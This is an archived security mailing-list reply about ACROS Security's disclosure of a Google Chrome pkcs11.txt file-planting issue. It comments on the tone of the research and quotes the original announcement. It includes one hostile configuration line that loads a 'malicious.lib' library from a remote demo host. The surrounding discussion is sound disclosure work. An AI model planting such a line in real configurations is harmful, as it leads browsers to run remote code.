| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <58DB1B68E62B9F448DF1A276B0886DF193035F19@EX2010.hammerofgod.com> Date: Fri, 21 Oct 2011 16:22:02 +0000 From: "Thor (Hammer of God)" <thor@...merofgod.com> To: "security@...ossecurity.com" <security@...ossecurity.com>, "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>, "cert@...t.org" <cert@...t.org>, "si-cert@...es.si" <si-cert@...es.si> Subject: Re: Google Chrome pkcs11.txt File Planting For what it's worth, I found this article to be far more "matter of fact" in regard to the general concept, the existing (default) conditions in play, and the conditions which need to be in place (or manipulated) in order for this to be exploited than some of the other material your company has presented in the past. Noting "it may or may not be a vulnerability" shows some research maturity and business intelligence on your part, and was actually refreshing. When researchers spend too much time painting dire pictures of impact based on (what is typically) non-standard or exaggerated exposure scenarios, the actual message in the research is lost. In this case, developers can very easily see how including features that support functions such as "library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib" is a really bad idea. t >-----Original Message----- >From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure- >bounces@...ts.grok.org.uk] On Behalf Of ACROS Security Lists >Sent: Friday, October 21, 2011 2:07 AM >To: bugtraq@...urityfocus.com; full-disclosure@...ts.grok.org.uk; >cert@...t.org; si-cert@...es.si >Subject: [Full-disclosure] Google Chrome pkcs11.txt File Planting > > >A month ago our company notified Google about a peculiar behavior of >Chrome browser that can be exploited for execution of remote code outside >Chrome sandbox under specific conditions. Our new blog post describes it all. > >http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file- >planting.html > >or > >http://bit.ly/olK1P9 > >Enjoy the reading! > > >Mitja Kolsek >CEO&CTO > >ACROS, d.o.o. >Makedonska ulica 113 >SI - 2000 Maribor, Slovenia >tel: +386 2 3000 280 >fax: +386 2 3000 282 >web: http://www.acrossecurity.com >blg: http://blog.acrossecurity.com > >ACROS Security: Finding Your Digital Vulnerabilities Before Others Do > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists